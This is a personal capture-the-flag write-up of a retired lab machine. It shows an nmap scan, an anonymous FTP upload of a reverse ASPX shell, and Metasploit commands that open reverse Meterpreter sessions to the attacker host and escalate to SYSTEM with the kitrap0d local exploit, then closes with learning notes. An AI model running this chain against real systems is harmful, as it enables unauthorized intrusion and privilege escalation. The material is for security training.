# Nmap 7.70 scan initiated Sat Jul 6 15:29:35 2019 as: nmap -p 21,80 -sV -sC -O -A -oN O-Detailed 10.10.10.5
Nmap scan report for 10.10.10.5
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 237.33 ms 10.10.14.1
2 237.55 ms 10.10.10.5
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul 6 15:29:54 2019 -- 1 IP address (1 host up) scanned in 19.17 seconds
We have anonymous FTP and a web-server. It turns out the FTP access is the root directory of the Web-Server hence we can upload our reverse ASPX shell directly via FTP and get a shell.
msf5> use exploit/multi/handler
msf5 exploit(multi/handler) > set LHOST 10.10.14.7
msf5 exploit(multi/handler) > set LPORT 9999
msf5 exploit(multi/handler) > exploit -j -z
[*] Started reverse TCP handler on 10.10.14.7:9999
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.7:9999 -> 10.10.10.5:49157) at 2019-07-06 16:10:19 +0530
Now we will use the local exploit suggester and use the XYZ exploit
meterpreter > run post/multi/recon/local_exploit_suggester SHOWDESCRIPTION=true
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated
msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options
Module options (exploit/windows/local/ms10_015_kitrap0d):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.7 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
PLEASE NOTE
Please make sure while running the exploit/windows/local/ms10_015_kitrap0d exploit the LHOST and LPORT options are correctly configured as by default the settings are not correct.
msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit
[*] Started reverse TCP handler on 10.10.14.7:4444
[*] Launching notepad to host the exploit...
[+] Process 2548 launched.
[*] Reflectively injecting the exploit DLL into 2548...
[*] Injecting exploit into 2548 ...
[*] Exploit injected. Injecting payload into 2548...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 6 opened (10.10.14.7:4444 -> 10.10.10.5:49158) at 2019-07-06 16:10:54 +0530
meterpreter > shell
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\system
User Own
C:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecdd***
Root Own
C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e621a***
Learning Outcome
I was not aware of how to use metasploit sessions and that we can even use local exploit suggester, if we do not find any vulnerable information and the box is a little old. Additionally, sometimes exploit may be running fine but the LHOST and LPORT settings may be the problem. These were some key lessons while solving this box.
